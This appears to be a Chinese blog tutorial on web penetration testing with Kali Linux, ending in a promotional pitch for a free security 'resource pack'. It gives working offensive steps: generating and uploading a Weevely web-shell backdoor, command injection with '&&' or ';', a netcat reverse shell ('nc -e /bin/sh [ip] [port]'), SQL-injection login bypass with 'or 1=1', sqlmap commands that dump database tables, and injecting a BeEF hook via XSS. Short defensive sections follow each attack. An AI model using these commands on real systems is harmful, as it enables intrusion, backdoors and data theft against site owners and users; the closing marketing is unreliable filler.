Web渗透:如何使用 Kali Linux 来访问目标 PC!什么是 Kali Linux?“Kali Linux 是一个基于 Debian 的 Linux 发行版,旨在进行高级渗透测试和安全审核”。
网络信息收集
在Web渗透中,信息就是力量、就是安全。因此,我们总是首先收集尽可能多的有关目标的信息——因为这可能会告诉我们实施攻击的最佳方式。
一台计算机(同一IP)上可以安装多个网站。如果您无法进入目标,请尝试侵入另一个网站。获取同一 IP 上的网站(Robtex 除外)的另一种方法是使用 bing 和 search ip。
发现子域
使用名为“knock”的工具(通常安装到 Kali 上的 /opt 中)。与 Kali Linux 上的大多数工具一样,Knock 是开源的,可以在https://github.com/guelfoweb/knock找到。
git clone <https://github.com/guelfoweb/knock.git>
cd 进入文件夹。
python knock.py 目标
如果不起作用,尝试使用 --resolve 运行上述命令,然后再次运行上述命令。
发现敏感文件
DIRB 是一个 Web 内容扫描器,它查找现有(或隐藏)的 Web 对象,在Web渗透中非常有用!DIRB 的工作原理是对 Web 服务器发起字典攻击并分析响应(本质上只是尝试不同的文件名并查看是否有响应)。
dirb [目标] [字典] [选项]
1. /:通常表示您位于一个目录中。
2. phpinfo.php:非常有用的信息
3. robots.txt:管理员不希望我们看到的隐藏信息。
利用****服务器漏洞
利用服务器漏洞进行Web渗透到常见方式,以下是利用 Web 服务器获得不同结果的一系列方法。
利用文件上传漏洞获取访问权限
Weevely 是一个隐秘的 Web shell,用于模拟类似 telnet 的连接。这可用作后门和/或管理 Web 服务器上的 Web 帐户。
创建后门:
weevly generate [密码] [路径+文件名]
上传文件:
weevly [文件地址]- 连接到文件
在尝试使用工具之前,只需浏览网站并感受一下,寻找功能中的漏洞,特别是网站是否允许上传。
利用代码执行漏洞
始终尝试您看到的任何输入框,因为它们正在执行命令,您也许可以更改该命令。
可以使用" && “或” ; "在unix中,可以在一行中执行多个命令。测试输入框是否允许这样做。
大多数服务器都有 python 和 netcat。
监听传入连接,例如使用 netcat:
netcat -vv -l -p [端口]- 侦听端口 8080 上的连接
IE。nc -e /bin/sh [ip] [端口] - netcat 连接。
下面是您可以执行以获得不同受支持语言的反向连接的命令列表。其中要更改的变量由[HOST_IP]和 表示,可以选择更改端口。请注意,这些都是“一行代码”,因此它们可以在输入框中执行。
预防 Web 服务器漏洞
发生上述情况只是因为服务器允许并且配置错误。
1、文件上传漏洞
· 不允许上传不安全的文件。
· 如果您要求提供图像,请确保它是图像,切勿允许 exe 上传。
· 检查文件类型,而不是扩展名。
2、代码执行漏洞
· 不要使用危险的功能,
· 执行前过滤输入
· 如果必须使用函数,请确保在执行之前分析输入。
· 使用正则表达式(regex)。
3、文件包含漏洞
· 禁用 php 中的allow_url_fopen 和allow_url_include 设置(在/etc/php5/cgi/php.ini 中)
· 使用静态文件包含(对文件进行硬编码)
SQL注入和攻击
连接到 mySQL 数据库:
mysql -u [用户名] -h [IP of server]
show 数据库
use [数据库]
show tables
通过注入绕过登录
另一个巧妙的用途是注入 SQL 查询,使得查询最终为SELECT * from accounts where user=‘admin’ and password=‘wrong_password’ or 1=1,这可能会以管理员身份登录我们,而根本不知道密码,因为如果查询评估 1 为,则 and 语句中的第二种情况将为 True等于 1。这在Web渗透中有很大的作用。
发现数据检索 (GET) 中的 SQL 注入
始终尝试在 php 脚本中注入内容(在地址栏中,它看起来像index.php&username=xxxx&password=xxxxx)
在字段后使用 ORDER BY,例如。index.php&username=xxxx’ ORDER BY 1 #&password=xxxxx确保对符号使用 URL 编码,即。# = %23
按列 100000 排序将返回错误,继续按 1,2,3,4,5 进行排序。
使用 SQLmap 执行上述及更多操作
`sqlmap --help` `sqlmap -u "[target_url]"` `sqlmap -u "[target_url]" --dbs`
获取数据库
sqlmap -u "[target_url]" --current-user
获取用户
sqlmap -u "[target_url]" --current-db
当前数据库
sqlmap -u "[target_url]" --tables -D [database]
获取-D数据库中的表
sqlmap -u "[target_url]" --columns -T [table_name] -D [database]
获取数据库表中的列
sqlmap -u "[target_url]" -T [table_name] -D [database] --dump
获取数据库表中的所有数据。
SQL漏洞防范
· 使用过滤器(但可以绕过)
· 使用拒绝列表或允许列表。(但可以绕过)
· 最好的方法是以不允许代码注入的方式对 Web 应用程序进行编码。
· 要执行上述操作,您必须使用参数化语句。(其中数据和代码是分开的)
跨站脚本(XSS)
在浏览网站的人而不是服务器上执行。允许将 javascript 注入到页面上。页面加载时执行代码。
三个主要类型
1. 持久/存储型 XSS
2. 反射型 XSS - 非持久性 XSS。仅当目标访问特制的网址时才有效,例如。target.com/page.php?something=alert(‘xss’)
3. 基于 DOM 的 XSS
使用参数(php 的东西)测试文本框和 url。
将牛肉钩注入易受攻击的页面。如果文本区域有最大长度,请进入开发人员控制台并检查元素并更改最大长度。
XSS漏洞防范
· 最小化输入。
· 将用户输入转换为 html 字符符号 so&nsb并使用 代替 & &jsjs;。
· 转义输入。
· 很少信任浏览器内的警报!
自动发现Web漏洞
使用 Zed Attack Proxy (zap) https://owasp.org/www-project-zap/,它已经安装在 Kali 上。
1. 在应用程序中搜索 ZAP
2. 您必须通过 github 获取此应用程序。
3. chmod +x [文件名]
4. 运行
5. 安装后点击不再持久。
6. 左侧的齿轮图标允许修改选项
7. 如果您单击底部窗口上的绿色加号,则转到活动扫描。然后,您可以在窗口左上角的小面板中更改策略。
8. 在自动扫描中添加 url。
9. 警报下方的左下角显示了所有已发现的漏洞。
10. 如果您右键单击其中一个警报(左下角),然后在浏览器中打开,它将向您显示该漏洞及其如何获取它。
Web渗透归根结底还是几个技术活,所以要学习的东西还是很多的!
网络安全学习资源分享:
给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,需要点击下方链接即可前往获取
读者福利 |
优快云大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)

👉1.成长路线图&学习规划👈
要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
👉2.网安入门到进阶视频教程👈
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程文末领取哈)
👉3.SRC&黑客文档👈
大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录
SRC技术文籍:
黑客资料由于是敏感资源,这里不能直接展示哦!(全套教程文末领取哈)
👉4.护网行动资料👈
其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
👉5.黑客必读书单👈
👉6.网络安全岗面试题合集👈
当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~
读者福利 |
优快云大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)
